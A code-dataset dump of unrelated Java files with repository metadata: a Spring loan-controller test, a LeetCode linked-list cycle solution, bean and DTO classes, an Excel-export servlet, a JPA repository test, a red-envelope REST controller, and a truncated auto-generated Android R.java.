package com.digitalacademy.loan.controller; import com.digitalacademy.loan.constants.LoanError; import com.digitalacademy.loan.exception.LoanException; import com.digitalacademy.loan.model.LoanInfoModel; import com.digitalacademy.loan.service.LoanService; import org.json.JSONObject; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.DisplayName; import org.junit.jupiter.api.Test; import org.junit.jupiter.api.extension.ExtendWith; import org.mockito.InjectMocks; import org.mockito.Mock; import org.mockito.MockitoAnnotations; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.http.HttpStatus; import org.springframework.http.MediaType; import org.springframework.test.context.junit.jupiter.SpringExtension; import org.springframework.test.web.servlet.MockMvc; import org.springframework.test.web.servlet.MockMvcBuilder; import org.springframework.test.web.servlet.MvcResult; import org.springframework.test.web.servlet.setup.MockMvcBuilders; import static org.junit.jupiter.api.Assertions.assertEquals; import static org.mockito.Mockito.*; import static org.springframework.test.web.servlet.request.MockMvcRequestBuilders.*; import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.*; import static org.mockito.Mockito.when; @ExtendWith(SpringExtension.class) @SpringBootTest public class LoanControllerTest { @Mock LoanService loanService; @InjectMocks LoanController loanController; private MockMvc mvc; @BeforeEach public void setUp() { MockitoAnnotations.initMocks(this); loanController = new LoanController(loanService); mvc = MockMvcBuilders.standaloneSetup(loanController).build(); } @DisplayName("Test get loan info by id equals 1 should return loan information") @Test void testGetLoanInfoByIdEquals1() throws Exception { Long reqParam = 1L; LoanInfoModel loanInfoModel = new LoanInfoModel(); loanInfoModel.setId(1L); loanInfoModel.setStatus("OK"); loanInfoModel.setAccountPayable("x02-222-2200"); loanInfoModel.setAccountReceivable("x02-333-3333"); loanInfoModel.setPrincipalAmount(40000.00); when(loanService.getLoanInfoById(reqParam)).thenReturn(loanInfoModel); MvcResult mvcResult = mvc.perform(get("/loan/info/" + reqParam)) .andExpect(status().isOk()) .andExpect(content().contentType(MediaType.APPLICATION_JSON_UTF8_VALUE)) .andReturn(); JSONObject resp = new JSONObject(mvcResult.getResponse().getContentAsString()); JSONObject status = new JSONObject(resp.getString("status")); JSONObject data = new JSONObject(resp.getString("data")); //status assertEquals("0", status.get("code").toString()); assertEquals("success", status.get("message").toString()); //data assertEquals(1, data.get("id")); assertEquals("OK", data.get("status")); assertEquals("x02-222-2200", data.get("account_payable")); assertEquals("x02-333-3333", data.get("account_receivable")); assertEquals(40000, data.get("principal_amount")); } @DisplayName("Test get loan info by id equals 2 should throw Loan Exception loan info not found") @Test void testGetLoanInfoByIdEquals2() throws Exception { Long reqParam = 2L; when(loanService.getLoanInfoById(reqParam)).thenThrow( new LoanException(LoanError.GET_LOAN_INFO_NOT_FOUND, HttpStatus.BAD_REQUEST) ); MvcResult mvcResult = mvc.perform(get("/loan/info/" + reqParam)) .andExpect(status().isOk()) .andExpect(content().contentType(MediaType.APPLICATION_JSON_UTF8_VALUE)) .andReturn(); JSONObject resp = new JSONObject(mvcResult.getResponse().getContentAsString()); JSONObject status = new JSONObject(resp.getString("status")); assertEquals("LOAN4002", status.get("code")); assertEquals("Loan information not found", status.get("message")); } @DisplayName("Test get loan info by id equals 3 should throw Exception: Test throw new exception") @Test void testGetLoanInfoByIdEquals3() throws Exception{ Long reqParam = 3L; when(loanService.getLoanInfoById(reqParam)).thenThrow( new Exception("Test throw new exception") ); MvcResult mvcResult = mvc.perform(get("/loan/info/" +reqParam)) .andExpect(status().isInternalServerError()) .andExpect(content().contentType(MediaType.APPLICATION_JSON_UTF8_VALUE)) .andReturn(); JSONObject resp = new JSONObject(mvcResult.getResponse().getContentAsString()); JSONObject status = new JSONObject(resp.getString("status")); assertEquals("LOAN4001", status.get("code")); assertEquals("Cannot get loan information", status.get("message")); } }
[ "s92300@scbcorp.co.th" ]
s92300@scbcorp.co.th
d6995303a526698145fb57d6bc2d942f566f629c
533aff3a01d582bdab1af9ab34d71905879592ed
/editor/cn/LinkedListCycleIi.java
ec32932a341d97177c3c8663b50e4b35c01e60a9
[]
no_license
ObedWang/leetcode
a9374da93ac1fa8066317ac606669d7eaf37d07c
8dabd31bd08f31a813b46fcfd4bd8b3249b6f4f6
refs/heads/master
2023-07-17T21:08:45.916221
2021-09-06T12:31:36
2021-09-06T12:31:36
359,711,896
0
0
null
null
null
null
UTF-8
Java
false
false
2,518
java
//给定一个链表,返回链表开始入环的第一个节点。 如果链表无环,则返回 null。 // // 为了表示给定链表中的环,我们使用整数 pos 来表示链表尾连接到链表中的位置(索引从 0 开始)。 如果 pos 是 -1,则在该链表中没有环。注意,po //s 仅仅是用于标识环的情况,并不会作为参数传递到函数中。 // // 说明:不允许修改给定的链表。 // // 进阶: // // // 你是否可以使用 O(1) 空间解决此题? // // // // // 示例 1: // // // // //输入:head = [3,2,0,-4], pos = 1 //输出:返回索引为 1 的链表节点 //解释:链表中有一个环,其尾部连接到第二个节点。 // // // 示例 2: // // // // //输入:head = [1,2], pos = 0 //输出:返回索引为 0 的链表节点 //解释:链表中有一个环,其尾部连接到第一个节点。 // // // 示例 3: // // // // //输入:head = [1], pos = -1 //输出:返回 null //解释:链表中没有环。 // // // // // 提示: // // // 链表中节点的数目范围在范围 [0, 104] 内 // -105 <= Node.val <= 105 // pos 的值为 -1 或者链表中的一个有效索引 // // Related Topics 链表 双指针 // 👍 1031 👎 0 package editor.cn; import java.util.HashSet; import java.util.Set; /** * @author web */ public class LinkedListCycleIi { public static void main(String[] args) { Solution solution = new LinkedListCycleIi().new Solution(); } //leetcode submit region begin(Prohibit modification and deletion) /** * Definition for singly-linked list. * class ListNode { * int val; * ListNode next; * ListNode(int x) { * val = x; * next = null; * } * } */ public class Solution { public ListNode detectCycle(ListNode head) { if (head == null) { return null; } ListNode slow = head, fast = head; while (fast != null) { slow = slow.next; if (fast.next != null) { fast = fast.next.next; } else { return null; } if (fast == slow) { ListNode target = head; while (target != slow) { target = target.next; slow = slow.next; } return target; } } return null; } } //leetcode submit region end(Prohibit modification and deletion) }
[ "527488549@qq.com" ]
527488549@qq.com
197329ef62edb5f7b2048d9df12b781f185f2173
e9a7408067ec0d00b17abcd8c94a422f7607fd0d
/src/com/java8/lambda/Person.java
2df9a4759b21b6ff9d603fe960738db0f9229aed
[]
no_license
amdimaano/test
d91d3cc3889900f64ef3abcf929e02f16c7b6c53
fced07b953cbdf9c79bd20bfe82b011f15a3e3f4
refs/heads/master
2020-03-17T14:26:49.174681
2018-11-26T06:19:52
2018-11-26T06:19:52
133,672,473
0
0
null
null
null
null
UTF-8
Java
false
false
1,331
java
package com.java8.lambda; import java.time.LocalDate; import java.time.Period; public class Person { public enum Sex { MALE, FEMALE } String name; LocalDate birthday; Sex gender; String emailAddress; public String getName() { return name; } public void setName(String name) { this.name = name; } public LocalDate getBirthday() { return birthday; } public void setBirthday(LocalDate birthday) { this.birthday = birthday; } public Sex getGender() { return gender; } public void setGender(Sex gender) { this.gender = gender; } public String getEmailAddress() { return emailAddress; } public void setEmailAddress(String emailAddress) { this.emailAddress = emailAddress; } public int getAge() { return Period.between(getBirthday(), LocalDate.now()).getYears(); } public void printPerson() { System.out.println(toString()); } @Override public String toString() { StringBuilder builder = new StringBuilder(); builder.append("Person [name="); builder.append(name); builder.append(", birthday="); builder.append(birthday); builder.append(", gender="); builder.append(gender); builder.append(", emailAddress="); builder.append(emailAddress); builder.append(", age="); builder.append(getAge()); builder.append("]"); return builder.toString(); } }
[ "AMDimaano@F10142.rcgitmanila.com" ]
AMDimaano@F10142.rcgitmanila.com
d4b8703e174017ab2640a09f9e80abb1e8d0d914
ccb2a94d496c7bf898939378f1e98bde6b14d44d
/src/com/comunus/projectReport/action/DownloadFileExcelSheet.java
6b7f92086fce50f6df4399963ad996c4c95e52ed
[]
no_license
kishan-hub/Projects-Report
9eb66ba3853536d66b67ba59947f0f5ee8803aa0
9e528896c326d64ef2d69e2830f23ab940351f4d
refs/heads/master
2023-08-05T05:19:57.924000
2023-07-31T08:36:16
2023-07-31T08:36:16
312,250,266
0
0
null
null
null
null
UTF-8
Java
false
false
2,900
java
package com.comunus.projectReport.action; import java.io.IOException; import java.util.Map; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import org.apache.poi.xssf.usermodel.XSSFWorkbook; import com.comunus.util.ExportExcel; @WebServlet("/DownloadFileExcelSheet") public class DownloadFileExcelSheet extends CommonServlet { private static final long serialVersionUID = 2067115822080269398L; public void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { validate(request, response); try { response.setContentType("application/vnd.ms-excel"); response.setHeader("Content-Disposition", "attachment; filename=SampleExcel.xls"); // HSSFWorkbook workbook = createExcel(); XSSFWorkbook workbook=createXSSFExcel(); ServletOutputStream inputStream=response.getOutputStream(); // ServletResponse servletResponse=(ServletResponse)response.getOutputStream(); workbook.write(inputStream); inputStream.flush(); inputStream.close(); } catch (Exception e) { throw new ServletException("Exception in DownLoad Excel Servlet", e); } } // private HSSFWorkbook createExcel() { // Map< String, Object[] > empinfo=null; // HSSFWorkbook workbook = new HSSFWorkbook(); // // // empinfo = new TreeMap<String, Object[]>(); // // empinfo.put( "1", new Object[] { // "EMP ID", "EMP NAME", "DESIGNATION" }); // Main main=new Main(); // UserData[] jsonObj=(UserData[]) main.getAuthorList("https://jsonplaceholder.typicode.com/posts"); // for(UserData itr:jsonObj) // { // empinfo.put(String.valueOf(itr.getUserId()), new Object[] {String.valueOf(itr.getId()), itr.getTitle(), itr.getBody()}); // } // HSSFSheet worksheet = workbook.createSheet("Rista User Detail Sheet"); // HSSFRow row1 = worksheet.createRow((short)2); // // HSSFCell cellA1 = row1.createCell((short)2); // cellA1.setCellValue(" Provided the Data by Communus"); // HSSFCellStyle cellStyle = workbook.createCellStyle(); // cellA1.setCellStyle(cellStyle); // return workbook; // } private XSSFWorkbook createXSSFExcel() { ExportExcel exportExcel=new ExportExcel(); // XSSFWorkbook workBook=exportExcel.createWorkBook(); XSSFWorkbook workBook = exportExcel.createDynamicSheet(); return workBook; } public void destroy() { // do nothing. } }
[ "kumarkishan2991@gmail.com" ]
kumarkishan2991@gmail.com
2a5018294f5cbd236281f0aea0337ca63dd58ef3
fe265eac986c320c1fd7e28576bc69f506e41a0b
/src/test/java/com/shop/restfull/repository/test/UsuarioRepositoryTest.java
8d7a64db5294ee1bc92d221e41bac7f59cbc650b
[]
no_license
Hugo221989/productosWebBackEnd
a0cc09a61ab33518b019446aa7c12bb0fbe45684
e58303ce4e6a50d375a8fc2bc8657a139ab260fe
refs/heads/master
2022-11-28T12:08:07.956642
2020-08-08T16:36:11
2020-08-08T16:36:11
262,394,265
0
0
null
2020-07-12T13:38:13
2020-05-08T18:06:42
Java
UTF-8
Java
false
false
2,554
java
package com.shop.restfull.repository.test; import static org.assertj.core.api.Assertions.assertThat; import java.util.List; import org.junit.Before; import org.junit.Test; import org.junit.runner.RunWith; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.test.autoconfigure.jdbc.AutoConfigureTestDatabase; import org.springframework.boot.test.autoconfigure.jdbc.AutoConfigureTestDatabase.Replace; import org.springframework.test.context.ActiveProfiles; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.junit4.SpringRunner; import org.springframework.test.context.support.AnnotationConfigContextLoader; import org.springframework.transaction.annotation.Transactional; import com.shop.restfull.config.H2TestProfileJPAConfig; import com.shop.restfull.dto.CustomerBasicDto; import com.shop.restfull.model.Usuario; import com.shop.restfull.repository.UsuarioRepository; @ContextConfiguration(classes = { H2TestProfileJPAConfig.class }, loader = AnnotationConfigContextLoader.class) @Transactional @ActiveProfiles("test") @RunWith(SpringRunner.class) @AutoConfigureTestDatabase(replace = Replace.NONE) public class UsuarioRepositoryTest { @Autowired private UsuarioRepository usuarioRepository; private Usuario usuario; private Usuario usuario2; @Before public void loadUserData() { usuario = new Usuario(); usuario.setNombre("Juan"); usuario.setApellido("Lomonaco"); usuario.setEmail("archi@gmail"); usuario2 = new Usuario(); usuario2.setNombre("Maria"); usuario2.setApellido("Nabo"); usuario2.setEmail("rabo@gmail"); this.usuarioRepository.save(usuario); this.usuarioRepository.save(usuario2); } @Test public void givenUserListShouldReturnCorrectSize() { List<CustomerBasicDto> customers = this.usuarioRepository.findCustomersBasic(); assertThat(customers.size()).isEqualTo(2); } @Test public void givenUserShouldReturnEmail() { Usuario user = this.usuarioRepository.findByEmail(usuario2.getEmail()).orElse(null); assertThat(user.getEmail()).isEqualTo(usuario2.getEmail()); } @Test public void whenEditUserShouldReturnDataUpdated() { String nombreModificado = "Juan Modificado"; Usuario user = this.usuarioRepository.findById(usuario.getId()).orElse(null); if(user != null) { user.setNombre(nombreModificado); this.usuarioRepository.save(user); } user = this.usuarioRepository.findById(usuario.getId()).orElse(null); assertThat(user.getNombre()).isEqualTo(nombreModificado); } }
[ "hugoonetto@gmail.com" ]
hugoonetto@gmail.com
5d3d4162c50363b78d211ea03776055284af6664
7122aad10ad5f12e23091c49dcfb3b16463546f1
/src/main/java/com/gsy/luckymoney/controller/LuckymoneyController.java
2681ac82406d5bf6517ef46b7494bee33ee2a4a9
[]
no_license
gsy13213009/luckymoney
5e31e20cabbfb41501b65bfa1edc580ded5892f0
5ec8d6885d686e8cf7b98c68d44e0e7de247faba
refs/heads/master
2022-04-14T22:51:33.102179
2020-04-12T12:37:14
2020-04-12T12:37:14
254,989,512
0
0
null
null
null
null
UTF-8
Java
false
false
2,235
java
package com.gsy.luckymoney.controller; import com.gsy.luckymoney.domain.Luckymoney; import com.gsy.luckymoney.repository.LuckymoneyRepository; import com.gsy.luckymoney.service.LuckymoneyService; import java.math.BigDecimal; import java.util.List; import java.util.Optional; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PathVariable; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.PutMapping; import org.springframework.web.bind.annotation.RequestParam; import org.springframework.web.bind.annotation.RestController; @RestController public class LuckymoneyController { @Autowired private LuckymoneyRepository repository; @Autowired private LuckymoneyService service; /** * 获取红包列表 */ @GetMapping("/luckymoneys") public List<Luckymoney> list() { return repository.findAll(); } /** * 创建红包 */ @PostMapping("/luckymoneys") public Luckymoney create(@RequestParam("producer") String producer, @RequestParam("money") BigDecimal money) { Luckymoney luckymoney = new Luckymoney(); luckymoney.setProducer(producer); luckymoney.setMoney(money); return repository.save(luckymoney); } /** * 查询红包 */ @GetMapping("/luckymoneys/{id}") public Luckymoney find(@PathVariable("id") Integer id) { // 查不到返回null return repository.findById(id).orElse(null); } /** * 更新红包 */ @PutMapping("/luckymoneys/{id}") public Luckymoney update(@PathVariable("id") Integer id, @RequestParam("consumer") String consumer) { Optional<Luckymoney> optional = repository.findById(id); // 如果有内容 if (optional.isPresent()) { Luckymoney luckymoney = optional.get(); luckymoney.setConsumer(consumer); repository.save(luckymoney); return luckymoney; } return null; } @PostMapping("/luckymoneys/two") public void createTwo() { service.createTwo(); } }
[ "siyi.guo@grabtaxi.com" ]
siyi.guo@grabtaxi.com
39e043496ea1fd3040aeff63ef325e391a377c55
f6835db0cf8aaa074e3778483a2de427862d8b0b
/MainApp/src/org/unibl/etf/dto/Image.java
ba26a9698ee8186ea007dbe4c93c73bf1acee630
[]
no_license
djokicaetfbl/ProjektniIP
24acf6e7a9679a0641dd62fbf6721ba7b5a40cbd
a42b6040f0fd477bd628cf0948e916c68ac4f37e
refs/heads/master
2023-02-12T08:08:34.624135
2021-01-11T10:08:36
2021-01-11T10:08:36
328,620,705
0
0
null
null
null
null
UTF-8
Java
false
false
1,367
java
package org.unibl.etf.dto; public class Image { private int id; private String content; private boolean active; private int postId; public Image() { super(); // TODO Auto-generated constructor stub } public Image(int id, String content, boolean active, int postId) { super(); this.id = id; this.content = content; this.active = active; this.postId = postId; } public int getId() { return id; } public void setId(int id) { this.id = id; } public String getContent() { return content; } public void setContent(String content) { this.content = content; } public boolean isActive() { return active; } public void setActive(boolean active) { this.active = active; } public int getPostId() { return postId; } public void setPostId(int postId) { this.postId = postId; } @Override public int hashCode() { final int prime = 31; int result = 1; result = prime * result + ((content == null) ? 0 : content.hashCode()); return result; } @Override public boolean equals(Object obj) { if (this == obj) return true; if (obj == null) return false; if (getClass() != obj.getClass()) return false; Image other = (Image) obj; if (content == null) { if (other.content != null) return false; } else if (!content.equals(other.content)) return false; return true; } }
[ "46675273+djokica94@users.noreply.github.com" ]
46675273+djokica94@users.noreply.github.com
865835c167ac75ad8eb17ea45211d911baa7e968
d6a99e5c0f8ad4c688e30d824e14cd2b67486ab1
/R/R.Android/obj/Debug/90/android/src/com/roomie/R.java
103a8433a616c1193f06acfef3c3cc508d109afe
[]
no_license
CharanDarbasthu/Roomie
d4f9e153f18b7da7b064d49e5e7201978f849d70
fa96cc94705da5c2057ac12314aad8d729f8d60c
refs/heads/master
2022-12-10T13:22:59.797536
2019-07-26T10:35:31
2019-07-26T10:35:31
198,657,113
0
0
null
null
null
null
UTF-8
Java
false
false
995,786
java
/* AUTO-GENERATED FILE. DO NOT MODIFY. * * This class was automatically generated by the * aapt tool from the resource data it found. It * should not be modified by hand. */ package com.roomie; public final class R { public static final class anim { public static final int abc_fade_in=0x7f050000; public static final int abc_fade_out=0x7f050001; public static final int abc_grow_fade_in_from_bottom=0x7f050002; public static final int abc_popup_enter=0x7f050003; public static final int abc_popup_exit=0x7f050004; public static final int abc_shrink_fade_out_from_bottom=0x7f050005; public static final int abc_slide_in_bottom=0x7f050006; public static final int abc_slide_in_top=0x7f050007; public static final int abc_slide_out_bottom=0x7f050008; public static final int abc_slide_out_top=0x7f050009; public static final int abc_tooltip_enter=0x7f05000a; public static final int abc_tooltip_exit=0x7f05000b; public static final int design_bottom_sheet_slide_in=0x7f05000c; public static final int design_bottom_sheet_slide_out=0x7f05000d; public static final int design_snackbar_in=0x7f05000e; public static final int design_snackbar_out=0x7f05000f; public static final int enterfromleft=0x7f050010; public static final int enterfromright=0x7f050011; public static final int exittoleft=0x7f050012; public static final int exittoright=0x7f050013; } public static final class animator { public static final int design_appbar_state_list_animator=0x7f060000; public static final int design_fab_hide_motion_spec=0x7f060001; public static final int design_fab_show_motion_spec=0x7f060002; public static final int mtrl_btn_state_list_anim=0x7f060003; public static final int mtrl_btn_unelevated_state_list_anim=0x7f060004; public static final int mtrl_chip_state_list_anim=0x7f060005; public static final int mtrl_fab_hide_motion_spec=0x7f060006; public static final int mtrl_fab_show_motion_spec=0x7f060007; public static final int mtrl_fab_transformation_sheet_collapse_spec=0x7f060008; public static final int mtrl_fab_transformation_sheet_expand_spec=0x7f060009; } public static final class attr { /** Custom divider drawable to use for elements in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarDivider=0x7f010076; /** Custom item state list drawable background for action bar items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarItemBackground=0x7f010077; /** Reference to a theme that should be used to inflate popups shown by widgets in the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarPopupTheme=0x7f010070; /** Size of the Action Bar, including the contextual bar used to present Action Modes. <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>wrap_content</code></td><td>0</td><td></td></tr> </table> */ public static final int actionBarSize=0x7f010075; /** Reference to a style for the split Action Bar. This style controls the split component that holds the menu/action buttons. actionBarStyle is still used for the primary bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarSplitStyle=0x7f010072; /** Reference to a style for the Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarStyle=0x7f010071; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarTabBarStyle=0x7f01006c; /** Default style for tabs within an action bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarTabStyle=0x7f01006b; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarTabTextStyle=0x7f01006d; /** Reference to a theme that should be used to inflate the action bar. This will be inherited by any widget inflated into the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarTheme=0x7f010073; /** Reference to a theme that should be used to inflate widgets and layouts destined for the action bar. Most of the time this will be a reference to the current theme, but when the action bar has a significantly different contrast profile than the rest of the activity the difference can become important. If this is set to @null the current theme will be used. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionBarWidgetTheme=0x7f010074; /** Default action button style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionButtonStyle=0x7f010092; /** Default ActionBar dropdown style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionDropDownStyle=0x7f01008e; /** An optional layout to be used as an action view. See {@link android.view.MenuItem#setActionView(android.view.View)} for more info. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionLayout=0x7f0100e9; /** TextAppearance style that will be applied to text that appears within action menu items. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionMenuTextAppearance=0x7f010078; /** Color for text that appears within action menu items. Color for text that appears within action menu items. <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int actionMenuTextColor=0x7f010079; /** Background drawable to use for action mode UI <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeBackground=0x7f01007c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeCloseButtonStyle=0x7f01007b; /** Drawable to use for the close action mode button <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeCloseDrawable=0x7f01007e; /** Drawable to use for the Copy action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeCopyDrawable=0x7f010080; /** Drawable to use for the Cut action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeCutDrawable=0x7f01007f; /** Drawable to use for the Find action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeFindDrawable=0x7f010084; /** Drawable to use for the Paste action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModePasteDrawable=0x7f010081; /** PopupWindow style to use for action modes when showing as a window overlay. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModePopupWindowStyle=0x7f010086; /** Drawable to use for the Select all action button in Contextual Action Bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeSelectAllDrawable=0x7f010082; /** Drawable to use for the Share action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeShareDrawable=0x7f010083; /** Background drawable to use for action mode UI in the lower split bar <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeSplitBackground=0x7f01007d; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeStyle=0x7f01007a; /** Drawable to use for the Web Search action button in WebView selection action modes <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionModeWebSearchDrawable=0x7f010085; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionOverflowButtonStyle=0x7f01006e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int actionOverflowMenuStyle=0x7f01006f; /** The name of an optional ActionProvider class to instantiate an action view and perform operations such as default action for that menu item. See {@link android.view.MenuItem#setActionProvider(android.view.ActionProvider)} for more info. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int actionProviderClass=0x7f0100eb; /** The name of an optional View class to instantiate and use as an action view. See {@link android.view.MenuItem#setActionView(android.view.View)} for more info. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int actionViewClass=0x7f0100ea; /** Default ActivityChooserView style. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int activityChooserViewStyle=0x7f01009a; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int alertDialogButtonGroupStyle=0x7f0100bf; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form 